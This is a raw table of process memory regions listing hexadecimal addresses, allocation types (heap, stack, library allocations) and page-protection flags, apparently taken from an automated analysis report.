||
5815000
|
heap
|
page read and write
|
||
6FEE000
|
stack
|
page read and write
|
||
61BC000
|
heap
|
page read and write
|
||
51C0000
|
direct allocation
|
page read and write
|
||
2B8C000
|
stack
|
page read and write
|
||
620A000
|
heap
|
page read and write
|
||
5D4F000
|
heap
|
page read and write
|
||
79C0000
|
trusted library allocation
|
page read and write
|
||
6102000
|
heap
|
page read and write
|
||
548F000
|
trusted library allocation
|
page read and write
|
||
7F62000
|
trusted library allocation
|
page read and write
|
||
5C99000
|
heap
|
page read and write
|
||
5D7C000
|
heap
|
page read and write
|
||
5D1A000
|
heap
|
page read and write
|
||
5D47000
|
heap
|
page read and write
|
||
6109000
|
heap
|
page read and write
|
||
6168000
|
heap
|
page read and write
|
||
61E1000
|
heap
|
page read and write
|
||
569F000
|
stack
|
page read and write
|
||
2D3E000
|
stack
|
page read and write
|
||
7C80000
|
heap
|
page read and write
|
||
5706000
|
heap
|
page read and write
|
||
328A000
|
heap
|
page read and write
|
||
5D53000
|
heap
|
page read and write
|
||
22FC000
|
stack
|
page read and write
|
||
2812000
|
heap
|
page read and write
|
||
860000
|
heap
|
page read and write
|
||
3160000
|
heap
|
page read and write
|
||
516E000
|
stack
|
page read and write
|
||
6197000
|
heap
|
page read and write
|
||
2780000
|
heap
|
page read and write
|
||
61A1000
|
heap
|
page read and write
|
||
69BB000
|
stack
|
page read and write
|
||
786D000
|
stack
|
page read and write
|
||
2DCE000
|
heap
|
page read and write
|
||
6237000
|
heap
|
page read and write
|
||
6224000
|
heap
|
page read and write
|
||
8520000
|
heap
|
page read and write
|
||
61D8000
|
heap
|
page read and write
|
||
56D9000
|
heap
|
page read and write
|
||
7190000
|
trusted library allocation
|
page read and write
|
||
37F7000
|
heap
|
page read and write
|
||
7351000
|
heap
|
page read and write
|
||
6F18000
|
heap
|
page read and write
|
||
620C000
|
heap
|
page read and write
|
||
56FE000
|
heap
|
page read and write
|
||
5CB2000
|
heap
|
page read and write
|
||
7CF0000
|
trusted library allocation
|
page read and write
|
||
5D51000
|
heap
|
page read and write
|
||
46F1000
|
trusted library allocation
|
page read and write
|
||
43A0000
|
heap
|
page read and write
|
||
4D26000
|
heap
|
page read and write
|
||
5E6B000
|
trusted library allocation
|
page read and write
|
||
71FE000
|
stack
|
page read and write
|
||
61B9000
|
heap
|
page read and write
|
||
32AE000
|
heap
|
page read and write
|
||
7754000
|
heap
|
page read and write
|
||
32CA000
|
heap
|
page read and write
|
||
7A53000
|
trusted library allocation
|
page read and write
|
||
6234000
|
heap
|
page read and write
|
||
71C0000
|
trusted library allocation
|
page read and write
|
||
7630000
|
trusted library allocation
|
page read and write
|
||
7CA7000
|
trusted library allocation
|
page read and write
|
||
7C3E000
|
stack
|
page read and write
|
||
303B000
|
heap
|
page read and write
|
||
5E50000
|
trusted library allocation
|
page read and write
|
||
57F3000
|
heap
|
page read and write
|
||
5817000
|
heap
|
page read and write
|
||
7294000
|
heap
|
page read and write
|
||
5DB1000
|
trusted library allocation
|
page read and write
|
||
5161000
|
trusted library allocation
|
page read and write
|
||
33FE000
|
stack
|
page read and write
|
||
5881000
|
trusted library allocation
|
page read and write
|
||
6165000
|
heap
|
page read and write
|
||
7736000
|
heap
|
page read and write
|
||
5B2E000
|
stack
|
page read and write
|
||
78FE000
|
stack
|
page read and write
|
||
5D80000
|
heap
|
page read and write
|
||
6CF0000
|
heap
|
page execute and read and write
|
||
61BC000
|
heap
|
page read and write
|
||
4DA0000
|
trusted library allocation
|
page read and write
|
||
4A40000
|
heap
|
page readonly
|
||
61A5000
|
heap
|
page read and write
|
||
51F0000
|
trusted library allocation
|
page read and write
|
||
619F000
|
heap
|
page read and write
|
||
61B7000
|
heap
|
page read and write
|
||
5C43000
|
heap
|
page read and write
|
||
620C000
|
heap
|
page read and write
|
||
723E000
|
stack
|
page read and write
|
||
615C000
|
heap
|
page read and write
|
||
7775000
|
heap
|
page read and write
|
||
329D000
|
heap
|
page read and write
|
||
5D83000
|
heap
|
page read and write
|
||
5D86000
|
heap
|
page read and write
|
||
76C0000
|
trusted library allocation
|
page read and write
|
||
6211000
|
heap
|
page read and write
|
||
61A1000
|
heap
|
page read and write
|
||
6161000
|
heap
|
page read and write
|
||
773E000
|
heap
|
page read and write
|
||
5D33000
|
heap
|
page read and write
|
||
313E000
|
stack
|
page read and write
|
||
5722000
|
heap
|
page read and write
|
||
4D38000
|
heap
|
page read and write
|
||
5D88000
|
heap
|
page read and write
|
||
6224000
|
heap
|
page read and write
|
||
2930000
|
trusted library allocation
|
page read and write
|
||
2950000
|
trusted library allocation
|
page read and write
|
||
5B6E000
|
stack
|
page read and write
|
||
5DA3000
|
trusted library allocation
|
page read and write
|
||
2D80000
|
trusted library allocation
|
page execute and read and write
|
||
5DAC000
|
trusted library allocation
|
page read and write
|
||
27EE000
|
heap
|
page read and write
|
||
3067000
|
heap
|
page read and write
|
||
2A00000
|
heap
|
page readonly
|
||
5715000
|
heap
|
page read and write
|
||
5B76000
|
trusted library allocation
|
page read and write
|
||
626D000
|
heap
|
page read and write
|
||
6F00000
|
heap
|
page read and write
|
||
622C000
|
heap
|
page read and write
|
||
6AD2000
|
heap
|
page read and write
|
||
4F8F000
|
stack
|
page read and write
|
||
6224000
|
heap
|
page read and write
|
||
7210000
|
heap
|
page read and write
|
||
5D66000
|
heap
|
page read and write
|
||
6CAE000
|
stack
|
page read and write
|
||
5756000
|
trusted library allocation
|
page read and write
|
||
32E2000
|
heap
|
page read and write
|
||
5D7C000
|
heap
|
page read and write
|
||
6E9A000
|
heap
|
page read and write
|
||
4D2D000
|
heap
|
page read and write
|
||
4847000
|
trusted library allocation
|
page read and write
|
||
5366000
|
trusted library allocation
|
page read and write
|
||
28D8000
|
heap
|
page read and write
|
||
727F000
|
heap
|
page read and write
|
||
7285000
|
heap
|
page read and write
|
||
230000
|
heap
|
page read and write
|
||
2820000
|
heap
|
page read and write
|
||
2D7A000
|
heap
|
page read and write
|
||
4CD0000
|
heap
|
page read and write
|
||
280000
|
heap
|
page read and write
|
||
5F4B000
|
stack
|
page read and write
|
||
56C9000
|
heap
|
page read and write
|
||
3B0000
|
heap
|
page read and write
|
||
321F000
|
heap
|
page read and write
|
||
6168000
|
heap
|
page read and write
|
||
7BC0000
|
trusted library allocation
|
page read and write
|
||
6244000
|
heap
|
page read and write
|
||
8090000
|
trusted library allocation
|
page execute and read and write
|
||
28A0000
|
heap
|
page read and write
|
||
3289000
|
heap
|
page read and write
|
||
7F480000
|
trusted library allocation
|
page execute and read and write
|
||
4660000
|
heap
|
page read and write
|
||
5722000
|
heap
|
page read and write
|
||
570E000
|
heap
|
page read and write
|
||
7BD0000
|
trusted library allocation
|
page read and write
|
||
31F0000
|
heap
|
page read and write
|
||
5C18000
|
heap
|
page read and write
|
||
56BC000
|
heap
|
page read and write
|
||
5D7C000
|
heap
|
page read and write
|
||
37F6000
|
heap
|
page read and write
|
||
31F8000
|
heap
|
page read and write
|
||
4EEB000
|
stack
|
page read and write
|
||
2F30000
|
heap
|
page read and write
|
||
32C3000
|
heap
|
page read and write
|
||
28D4000
|
heap
|
page read and write
|
||
6D42000
|
heap
|
page read and write
|
||
5D8F000
|
heap
|
page read and write
|
||
6173000
|
heap
|
page read and write
|
||
6E5B000
|
heap
|
page read and write
|
||
5D09000
|
heap
|
page read and write
|
||
2338000
|
stack
|
page read and write
|
||
622F000
|
heap
|
page read and write
|
||
8180000
|
trusted library allocation
|
page read and write
|
||
4AB6000
|
trusted library allocation
|
page read and write
|
||
5722000
|
heap
|
page read and write
|
||
6228000
|
heap
|
page read and write
|
||
28DC000
|
heap
|
page read and write
|
||
80A0000
|
trusted library allocation
|
page read and write
|
||
79B0000
|
trusted library allocation
|
page read and write
|
||
4D01000
|
heap
|
page read and write
|
||
2924000
|
trusted library allocation
|
page read and write
|
||
4CD9000
|
heap
|
page read and write
|
||
5D0B000
|
heap
|
page read and write
|
||
286B000
|
heap
|
page read and write
|
||
4B5A000
|
trusted library allocation
|
page read and write
|
||
48D000
|
stack
|
page read and write
|
||
773A000
|
heap
|
page read and write
|
||
622C000
|
heap
|
page read and write
|
||
4C32000
|
direct allocation
|
page read and write
|
||
2826000
|
heap
|
page read and write
|
||
502E000
|
stack
|
page read and write
|
||
2828000
|
heap
|
page read and write
|
||
4F80000
|
heap
|
page read and write
|
||
70ED000
|
stack
|
page read and write
|
||
4BE9000
|
trusted library allocation
|
page read and write
|
||
7A10000
|
trusted library allocation
|
page read and write
|
||
6300000
|
trusted library allocation
|
page read and write
|
||
32C0000
|
heap
|
page read and write
|
||
2BC8000
|
stack
|
page read and write
|
||
6161000
|
heap
|
page read and write
|
||
6203000
|
heap
|
page read and write
|
||
6D4E000
|
stack
|
page read and write
|
||
5785000
|
heap
|
page read and write
|
||
6C4E000
|
stack
|
page read and write
|
||
27DC000
|
stack
|
page read and write
|
||
6166000
|
trusted library allocation
|
page read and write
|
||
286C000
|
heap
|
page read and write
|
||
5D53000
|
heap
|
page read and write
|
||
7204000
|
heap
|
page read and write
|
||
5817000
|
heap
|
page read and write
|
||
5C9E000
|
heap
|
page read and write
|
||
61E1000
|
heap
|
page read and write
|
||
4CCE000
|
heap
|
page read and write
|
||
5895000
|
trusted library allocation
|
page read and write
|
||
2F7E000
|
stack
|
page read and write
|
||
7BB0000
|
trusted library allocation
|
page execute and read and write
|
||
851E000
|
stack
|
page read and write
|
||
5D8F000
|
heap
|
page read and write
|
||
8100000
|
trusted library allocation
|
page read and write
|
||
570B000
|
heap
|
page read and write
|
||
284B000
|
heap
|
page read and write
|
||
5D86000
|
heap
|
page read and write
|
||
7A40000
|
trusted library allocation
|
page read and write
|
||
42D0000
|
heap
|
page execute and read and write
|
||
622F000
|
heap
|
page read and write
|
||
8250000
|
trusted library allocation
|
page read and write
|
||
5D53000
|
heap
|
page read and write
|
||
5D1A000
|
heap
|
page read and write
|
||
28D8000
|
heap
|
page read and write
|
||
4B48000
|
trusted library allocation
|
page read and write
|
||
329D000
|
heap
|
page read and write
|
||
56F3000
|
heap
|
page read and write
|
||
28D8000
|
heap
|
page read and write
|
||
5D47000
|
heap
|
page read and write
|
||
2E40000
|
heap
|
page read and write
|
||
620A000
|
heap
|
page read and write
|
||
5D87000
|
heap
|
page read and write
|
||
5D86000
|
heap
|
page read and write
|
||
622F000
|
heap
|
page read and write
|
||
4A57000
|
heap
|
page read and write
|
||
8080000
|
heap
|
page read and write
|
||
4B76000
|
trusted library allocation
|
page read and write
|
||
61A1000
|
heap
|
page read and write
|
||
5783000
|
heap
|
page read and write
|
||
32A8000
|
heap
|
page read and write
|
||
6234000
|
heap
|
page read and write
|
||
32A8000
|
heap
|
page read and write
|
||
5D53000
|
heap
|
page read and write
|
||
5D8F000
|
heap
|
page read and write
|
||
831E000
|
stack
|
page read and write
|
||
84DD000
|
stack
|
page read and write
|
||
5CB2000
|
heap
|
page read and write
|
||
622F000
|
heap
|
page read and write
|
||
5D83000
|
heap
|
page read and write
|
||
71D0000
|
trusted library allocation
|
page read and write
|
||
6227000
|
heap
|
page read and write
|
||
2819000
|
heap
|
page read and write
|
||
839E000
|
stack
|
page read and write
|
||
5BDB000
|
heap
|
page read and write
|
||
2A90000
|
heap
|
page read and write
|
||
5D80000
|
heap
|
page read and write
|
||
82DE000
|
stack
|
page read and write
|
||
2849000
|
heap
|
page read and write
|
||
2839000
|
heap
|
page read and write
|
||
5CA0000
|
heap
|
page read and write
|
||
7FA0000
|
trusted library allocation
|
page read and write
|
||
4AA8000
|
trusted library allocation
|
page read and write
|
||
2BAE000
|
stack
|
page read and write
|
||
28CB000
|
heap
|
page read and write
|
||
26A7000
|
heap
|
page read and write
|
||
6222000
|
heap
|
page read and write
|
||
6168000
|
heap
|
page read and write
|
||
29DE000
|
stack
|
page read and write
|
||
620B000
|
heap
|
page read and write
|
||
6249000
|
heap
|
page read and write
|
||
76FB000
|
heap
|
page read and write
|
||
32E2000
|
heap
|
page read and write
|
||
5D83000
|
heap
|
page read and write
|
||
6224000
|
heap
|
page read and write
|
||
616F000
|
heap
|
page read and write
|
||
84F000
|
stack
|
page read and write
|
||
5D86000
|
heap
|
page read and write
|
||
5D4F000
|
heap
|
page read and write
|
||
61A5000
|
heap
|
page read and write
|
||
7110000
|
trusted library allocation
|
page read and write
|
||
61A4000
|
heap
|
page read and write
|
||
5D45000
|
heap
|
page read and write
|
||
5D86000
|
heap
|
page read and write
|
||
32AE000
|
heap
|
page read and write
|
||
2747000
|
heap
|
page read and write
|
||
5D45000
|
heap
|
page read and write
|
||
4B1F000
|
trusted library allocation
|
page read and write
|
||
702E000
|
stack
|
page read and write
|
||
6168000
|
heap
|
page read and write
|
||
86BE000
|
stack
|
page read and write
|
||
676C000
|
stack
|
page read and write
|
||
34C000
|
stack
|
page read and write
|
||
2C30000
|
heap
|
page read and write
|
||
6218000
|
heap
|
page read and write
|
||
4C2A000
|
trusted library allocation
|
page read and write
|
||
4666000
|
heap
|
page read and write
|
||
71A0000
|
trusted library allocation
|
page read and write
|
||
5783000
|
heap
|
page read and write
|
||
56F1000
|
trusted library allocation
|
page read and write
|
||
56E5000
|
heap
|
page read and write
|
||
75C0000
|
trusted library allocation
|
page read and write
|
||
697D000
|
stack
|
page read and write
|
||
324D000
|
heap
|
page read and write
|
||
2DBE000
|
heap
|
page read and write
|
||
6D2F000
|
stack
|
page read and write
|
||
6CF5000
|
heap
|
page execute and read and write
|
||
7741000
|
heap
|
page read and write
|
||
61A5000
|
heap
|
page read and write
|
||
5783000
|
heap
|
page read and write
|
||
6C0F000
|
stack
|
page read and write
|
||
6222000
|
heap
|
page read and write
|
||
620A000
|
heap
|
page read and write
|
||
5B11000
|
trusted library allocation
|
page read and write
|
||
6030000
|
trusted library allocation
|
page execute
|
||
68C0000
|
trusted library section
|
page read and write
|
||
6244000
|
heap
|
page read and write
|
||
3259000
|
heap
|
page read and write
|
||
51CE000
|
direct allocation
|
page read and write
|
||
2853000
|
heap
|
page read and write
|
||
825B000
|
trusted library allocation
|
page read and write
|
||
4ACA000
|
stack
|
page read and write
|
||
2C90000
|
trusted library allocation
|
page read and write
|
||
56DE000
|
heap
|
page read and write
|
||
2A3D000
|
stack
|
page read and write
|
||
6234000
|
heap
|
page read and write
|
||
4D26000
|
heap
|
page read and write
|
||
79A0000
|
trusted library allocation
|
page read and write
|
||
5C97000
|
heap
|
page read and write
|
||
63DB000
|
trusted library allocation
|
page read and write
|
||
363F000
|
stack
|
page read and write
|
||
4CE3000
|
heap
|
page read and write
|
||
500E000
|
stack
|
page read and write
|
||
4D18000
|
heap
|
page read and write
|
||
3FD000
|
stack
|
page read and write
|
||
2A38000
|
stack
|
page read and write
|
||
61D8000
|
heap
|
page read and write
|
||
7DDE000
|
heap
|
page read and write
|
||
5D51000
|
heap
|
page read and write
|
||
7DAB000
|
heap
|
page read and write
|
||
76A0000
|
trusted library allocation
|
page read and write
|
||
5D87000
|
heap
|
page read and write
|
||
61FF000
|
heap
|
page read and write
|
||
616D000
|
heap
|
page read and write
|
||
37F5000
|
heap
|
page read and write
|
||
5257000
|
trusted library allocation
|
page read and write
|
||
5A49000
|
trusted library allocation
|
page read and write
|
||
6330000
|
trusted library allocation
|
page read and write
|
||
622C000
|
heap
|
page read and write
|
||
56A9000
|
heap
|
page read and write
|
||
5D8F000
|
heap
|
page read and write
|
||
5D1A000
|
heap
|
page read and write
|
||
31C0000
|
heap
|
page read and write
|
||
7D10000
|
trusted library allocation
|
page read and write
|
||
6203000
|
heap
|
page read and write
|
||
32BF000
|
heap
|
page read and write
|
||
7130000
|
trusted library allocation
|
page read and write
|
||
616F000
|
heap
|
page read and write
|
||
6222000
|
heap
|
page read and write
|
||
4D02000
|
heap
|
page read and write
|
||
6E49000
|
heap
|
page read and write
|
||
5BA0000
|
heap
|
page read and write
|
||
2CB2000
|
trusted library allocation
|
page read and write
|
||
32BD000
|
heap
|
page read and write
|
||
5D83000
|
heap
|
page read and write
|
||
4C26000
|
direct allocation
|
page read and write
|
||
5FF0000
|
trusted library allocation
|
page read and write
|
||
6D00000
|
heap
|
page read and write
|
||
5E0E000
|
stack
|
page read and write
|
||
5D86000
|
heap
|
page read and write
|
||
6244000
|
heap
|
page read and write
|
||
5D8F000
|
heap
|
page read and write
|
||
56A1000
|
heap
|
page read and write
|
||
57EA000
|
heap
|
page read and write
|
||
303B000
|
stack
|
page read and write
|
||
4C22000
|
direct allocation
|
page read and write
|
||
37FB000
|
heap
|
page read and write
|
||
2854000
|
heap
|
page read and write
|
||
5F0F000
|
stack
|
page read and write
|
||
302C000
|
heap
|
page read and write
|
||
2640000
|
heap
|
page read and write
|
||
726E000
|
heap
|
page read and write
|
||
622C000
|
heap
|
page read and write
|
||
49EE000
|
stack
|
page read and write
|
||
86FE000
|
stack
|
page read and write
|
||
306C000
|
heap
|
page read and write
|
||
27FE000
|
heap
|
page read and write
|
||
61AC000
|
heap
|
page read and write
|
||
28D4000
|
heap
|
page read and write
|
||
5E5F000
|
trusted library allocation
|
page read and write
|
||
5D8F000
|
heap
|
page read and write
|
||
4753000
|
trusted library allocation
|
page read and write
|
||
285D000
|
heap
|
page read and write
|
||
5783000
|
heap
|
page read and write
|
||
6211000
|
heap
|
page read and write
|
||
5D86000
|
heap
|
page read and write
|
||
6244000
|
heap
|
page read and write
|
||
6222000
|
heap
|
page read and write
|
||
4950000
|
trusted library allocation
|
page read and write
|
||
4EF6000
|
trusted library allocation
|
page read and write
|
||
7A20000
|
trusted library allocation
|
page read and write
|
||
4D38000
|
heap
|
page read and write
|
||
519F000
|
stack
|
page read and write
|
||
57A0000
|
heap
|
page read and write
|
||
5892000
|
trusted library allocation
|
page read and write
|
||
496D000
|
trusted library allocation
|
page execute and read and write
|
||
328A000
|
heap
|
page read and write
|
||
6109000
|
heap
|
page read and write
|
||
8440000
|
trusted library allocation
|
page execute and read and write
|
||
5D09000
|
heap
|
page read and write
|
||
6174000
|
heap
|
page read and write
|
||
618E000
|
heap
|
page read and write
|
||
2A40000
|
heap
|
page read and write
|
||
6F40000
|
heap
|
page execute and read and write
|
||
6BCE000
|
stack
|
page read and write
|
||
7680000
|
trusted library allocation
|
page read and write
|
||
5E54000
|
trusted library allocation
|
page read and write
|
||
2DFE000
|
heap
|
page read and write
|
||
57A1000
|
heap
|
page read and write
|
||
58A1000
|
trusted library allocation
|
page read and write
|
||
5899000
|
trusted library allocation
|
page read and write
|
||
615A000
|
heap
|
page read and write
|
||
2CB5000
|
trusted library allocation
|
page execute and read and write
|
||
61B6000
|
heap
|
page read and write
|
||
509E000
|
stack
|
page read and write
|
||
51A0000
|
direct allocation
|
page read and write
|
||
6195000
|
heap
|
page read and write
|
||
4BD8000
|
trusted library allocation
|
page read and write
|
||
5C6F000
|
stack
|
page read and write
|
||
4CD8000
|
heap
|
page read and write
|
||
50F0000
|
heap
|
page execute and read and write
|
||
8530000
|
trusted library allocation
|
page execute and read and write
|
||
2853000
|
heap
|
page read and write
|
||
4EEE000
|
trusted library allocation
|
page read and write
|
||
713E000
|
stack
|
page read and write
|
||
75C2000
|
heap
|
page read and write
|
||
5D86000
|
heap
|
page read and write
|
||
7180000
|
trusted library allocation
|
page read and write
|
||
60E0000
|
heap
|
page read and write
|
||
2F20000
|
heap
|
page read and write
|
||
6236000
|
heap
|
page read and write
|
||
2743000
|
heap
|
page read and write
|
||
28D8000
|
heap
|
page read and write
|
||
7820000
|
trusted library allocation
|
page read and write
|
||
27F1000
|
heap
|
page read and write
|
||
2877000
|
heap
|
page read and write
|
||
2C80000
|
trusted library allocation
|
page read and write
|
||
27B0000
|
heap
|
page read and write
|
||
2B60000
|
heap
|
page read and write
|
||
6224000
|
heap
|
page read and write
|
||
2849000
|
heap
|
page read and write
|
||
2C8D000
|
trusted library allocation
|
page execute and read and write
|
||
2D99000
|
heap
|
page read and write
|
||
6197000
|
heap
|
page read and write
|
||
61E1000
|
heap
|
page read and write
|
||
621D000
|
heap
|
page read and write
|
||
5D80000
|
heap
|
page read and write
|
||
26A0000
|
heap
|
page read and write
|
||
4B11000
|
trusted library allocation
|
page read and write
|
||
5811000
|
heap
|
page read and write
|
||
56EE000
|
heap
|
page read and write
|
||
5DA1000
|
trusted library allocation
|
page read and write
|
||
2BE6000
|
heap
|
page read and write
|
||
4EAE000
|
stack
|
page read and write
|
||
6FAE000
|
stack
|
page read and write
|
||
61BC000
|
heap
|
page read and write
|
||
7310000
|
trusted library allocation
|
page read and write
|
||
6B8E000
|
stack
|
page read and write
|
||
4C60000
|
direct allocation
|
page read and write
|
||
2876000
|
heap
|
page read and write
|
||
3075000
|
heap
|
page read and write
|
||
2CB0000
|
trusted library allocation
|
page read and write
|
||
6222000
|
heap
|
page read and write
|
||
619F000
|
heap
|
page read and write
|
||
7120000
|
trusted library allocation
|
page read and write
|
||
622E000
|
heap
|
page read and write
|
||
710000
|
heap
|
page read and write
|
||
8460000
|
trusted library allocation
|
page read and write
|
||
5D87000
|
heap
|
page read and write
|
||
32E2000
|
heap
|
page read and write
|
||
3259000
|
heap
|
page read and write
|
||
75E0000
|
trusted library allocation
|
page read and write
|
||
4D2D000
|
heap
|
page read and write
|
||
28DD000
|
heap
|
page read and write
|
||
5CAF000
|
heap
|
page read and write
|
||
2B76000
|
heap
|
page read and write
|
||
4A50000
|
heap
|
page read and write
|
||
571A000
|
heap
|
page read and write
|
||
5783000
|
heap
|
page read and write
|
||
28D2000
|
heap
|
page read and write
|
||
4D1D000
|
heap
|
page read and write
|
||
4979000
|
trusted library allocation
|
page read and write
|
||
7CAB000
|
trusted library allocation
|
page read and write
|
||
61AC000
|
heap
|
page read and write
|
||
4E3E000
|
stack
|
page read and write
|
||
61A8000
|
heap
|
page read and write
|
||
353E000
|
stack
|
page read and write
|
||
79D0000
|
trusted library allocation
|
page read and write
|
||
620A000
|
heap
|
page read and write
|
||
2876000
|
heap
|
page read and write
|
||
5810000
|
heap
|
page read and write
|
||
6218000
|
heap
|
page read and write
|
||
4B00000
|
heap
|
page read and write
|
||
7F90000
|
trusted library allocation
|
page read and write
|
||
7C7E000
|
stack
|
page read and write
|
||
5D51000
|
heap
|
page read and write
|
||
56B1000
|
heap
|
page read and write
|
||
6197000
|
heap
|
page read and write
|
||
552F000
|
stack
|
page read and write
|
||
616D000
|
heap
|
page read and write
|
||
6EFB000
|
heap
|
page read and write
|
||
7670000
|
trusted library allocation
|
page read and write
|
||
6F17000
|
heap
|
page read and write
|
||
71BE000
|
stack
|
page read and write
|
||
2ADE000
|
stack
|
page read and write
|
||
5D45000
|
heap
|
page read and write
|
||
4E34000
|
trusted library allocation
|
page read and write
|
||
83FE000
|
stack
|
page read and write
|
||
6104000
|
heap
|
page read and write
|
||
5C16000
|
heap
|
page read and write
|
||
32CA000
|
heap
|
page read and write
|
||
49AF000
|
stack
|
page read and write
|
||
4A2F000
|
stack
|
page read and write
|
||
7990000
|
trusted library allocation
|
page read and write
|
||
86DB000
|
stack
|
page read and write
|
||
2C2E000
|
stack
|
page read and write
|
||
79E0000
|
trusted library allocation
|
page read and write
|
||
5D09000
|
heap
|
page read and write
|
||
7A00000
|
trusted library allocation
|
page read and write
|
||
868000
|
heap
|
page read and write
|
||
7CD0000
|
heap
|
page read and write
|
||
5628000
|
trusted library allocation
|
page read and write
|
||
620C000
|
heap
|
page read and write
|
||
3218000
|
heap
|
page read and write
|
||
7810000
|
trusted library allocation
|
page read and write
|
||
5D83000
|
heap
|
page read and write
|
||
61DE000
|
heap
|
page read and write
|
||
8430000
|
heap
|
page read and write
|
||
5C97000
|
heap
|
page read and write
|
||
616F000
|
heap
|
page read and write
|
||
6A7E000
|
stack
|
page read and write
|
||
56B4000
|
heap
|
page read and write
|
||
6224000
|
heap
|
page read and write
|
||
56C9000
|
heap
|
page read and write
|
||
74FE000
|
stack
|
page read and write
|
||
5723000
|
heap
|
page read and write
|
||
32ED000
|
heap
|
page read and write
|
||
7140000
|
trusted library allocation
|
page read and write
|
||
717E000
|
stack
|
page read and write
|
||
4CD5000
|
heap
|
page read and write
|
||
6CEE000
|
stack
|
page read and write
|
||
2845000
|
heap
|
page read and write
|
||
6234000
|
heap
|
page read and write
|
||
32E2000
|
heap
|
page read and write
|
||
622C000
|
heap
|
page read and write
|
||
4E7A000
|
trusted library allocation
|
page read and write
|
||
5D86000
|
heap
|
page read and write
|
||
3296000
|
heap
|
page read and write
|
||
70E000
|
stack
|
page read and write
|
||
263E000
|
stack
|
page read and write
|
||
757E000
|
stack
|
page read and write
|
||
620A000
|
heap
|
page read and write
|
||
5CAF000
|
heap
|
page read and write
|
||
31B0000
|
heap
|
page read and write
|
||
774B000
|
heap
|
page read and write
|
||
5D1B000
|
heap
|
page read and write
|
||
27FE000
|
heap
|
page read and write
|
||
5D47000
|
heap
|
page read and write
|
||
3218000
|
heap
|
page read and write
|
||
5D1A000
|
heap
|
page read and write
|
||
5722000
|
heap
|
page read and write
|
||
2B7A000
|
heap
|
page read and write
|
||
4CDE000
|
heap
|
page read and write
|
||
2790000
|
heap
|
page read and write
|
||
2C99000
|
trusted library allocation
|
page read and write
|
||
6165000
|
heap
|
page read and write
|
||
281F000
|
heap
|
page read and write
|
||
4AB0000
|
trusted library allocation
|
page read and write
|
||
6165000
|
heap
|
page read and write
|
||
5D45000
|
heap
|
page read and write
|
||
426D000
|
stack
|
page read and write
|
||
289C000
|
heap
|
page read and write
|
||
56A0000
|
heap
|
page read and write
|
||
7690000
|
trusted library allocation
|
page read and write
|
||
797D000
|
stack
|
page read and write
|
||
622C000
|
heap
|
page read and write
|
||
6C6E000
|
stack
|
page read and write
|
||
23FE000
|
stack
|
page read and write
|
||
329A000
|
heap
|
page read and write
|
||
77F0000
|
trusted library allocation
|
page read and write
|
||
7A30000
|
trusted library allocation
|
page read and write
|
||
5722000
|
heap
|
page read and write
|
||
542E000
|
stack
|
page read and write
|
||
623E000
|
heap
|
page read and write
|
||
4FB0000
|
heap
|
page read and write
|
||
2842000
|
heap
|
page read and write
|
||
2952000
|
trusted library allocation
|
page read and write
|
||
7E4B000
|
heap
|
page read and write
|
||
286B000
|
heap
|
page read and write
|
||
7D00000
|
trusted library allocation
|
page read and write
|
||
69FE000
|
stack
|
page read and write
|
||
5D84000
|
heap
|
page read and write
|
||
56AC000
|
heap
|
page read and write
|
||
2812000
|
heap
|
page read and write
|
||
7DE6000
|
heap
|
page read and write
|
||
5D66000
|
heap
|
page read and write
|
||
5D09000
|
heap
|
page read and write
|
||
616F000
|
heap
|
page read and write
|
||
691E000
|
stack
|
page read and write
|
||
8440000
|
trusted library allocation
|
page read and write
|
||
43A7000
|
heap
|
page read and write
|
||
61FE000
|
heap
|
page read and write
|
||
4D38000
|
heap
|
page read and write
|
||
4CD3000
|
heap
|
page read and write
|
||
56D6000
|
heap
|
page read and write
|
||
4DFC000
|
stack
|
page read and write
|
||
2740000
|
heap
|
page read and write
|
||
4D24000
|
heap
|
page read and write
|
||
5722000
|
heap
|
page read and write
|
||
4F48000
|
heap
|
page read and write
|
||
5D1B000
|
heap
|
page read and write
|
||
4664000
|
heap
|
page read and write
|
||
616F000
|
heap
|
page read and write
|
||
620A000
|
heap
|
page read and write
|
||
6222000
|
heap
|
page read and write
|
||
4FEE000
|
stack
|
page read and write
|
||
61D7000
|
heap
|
page read and write
|
||
620A000
|
heap
|
page read and write
|
||
498A000
|
trusted library allocation
|
page execute and read and write
|
||
7640000
|
trusted library allocation
|
page read and write
|
||
7DA2000
|
heap
|
page read and write
|
||
79F0000
|
trusted library allocation
|
page read and write
|
||
4CC0000
|
heap
|
page read and write
|
||
622C000
|
heap
|
page read and write
|
||
5DA5000
|
trusted library allocation
|
page read and write
|
||
2848000
|
heap
|
page read and write
|
||
6398000
|
trusted library allocation
|
page read and write
|
||
6211000
|
heap
|
page read and write
|
||
4A3E000
|
stack
|
page read and write
|
||
6AC0000
|
heap
|
page read and write
|
||
6F1C000
|
heap
|
page read and write
|
||
7273000
|
heap
|
page read and write
|
||
793E000
|
stack
|
page read and write
|
||
74FE000
|
stack
|
page read and write
|
||
2C84000
|
trusted library allocation
|
page read and write
|
||
5C6E000
|
heap
|
page read and write
|
||
4BD3000
|
trusted library allocation
|
page read and write
|
||
61A1000
|
heap
|
page read and write
|
||
28DC000
|
heap
|
page read and write
|
||
60B0000
|
trusted library allocation
|
page read and write
|
||
3217000
|
heap
|
page read and write
|
||
4CBD000
|
heap
|
page read and write
|
||
6219000
|
heap
|
page read and write
|
||
5D53000
|
heap
|
page read and write
|
||
7170000
|
trusted library allocation
|
page read and write
|
||
5353000
|
trusted library allocation
|
page read and write
|
||
620A000
|
heap
|
page read and write
|
||
6E75000
|
heap
|
page read and write
|
||
56C2000
|
heap
|
page read and write
|
||
5620000
|
trusted library allocation
|
page read and write
|
||
32AE000
|
heap
|
page read and write
|
||
7620000
|
trusted library allocation
|
page read and write
|
||
5D45000
|
heap
|
page read and write
|
||
7650000
|
trusted library allocation
|
page read and write
|
||
3211000
|
heap
|
page read and write
|
||
2CF0000
|
heap
|
page execute and read and write
|
||
7798000
|
heap
|
page read and write
|
||
5DAE000
|
trusted library allocation
|
page read and write
|
||
5D81000
|
heap
|
page read and write
|
||
80B0000
|
trusted library allocation
|
page read and write
|
||
713E000
|
stack
|
page read and write
|
||
62F6000
|
trusted library allocation
|
page read and write
|
||
4DA8000
|
trusted library allocation
|
page read and write
|
||
5722000
|
heap
|
page read and write
|
||
8EE0000
|
heap
|
page read and write
|
||
2923000
|
trusted library allocation
|
page execute and read and write
|
||
7C90000
|
trusted library allocation
|
page execute and read and write
|
||
37FB000
|
heap
|
page read and write
|
||
2812000
|
heap
|
page read and write
|
||
70F0000
|
trusted library allocation
|
page read and write
|
||
31A0000
|
heap
|
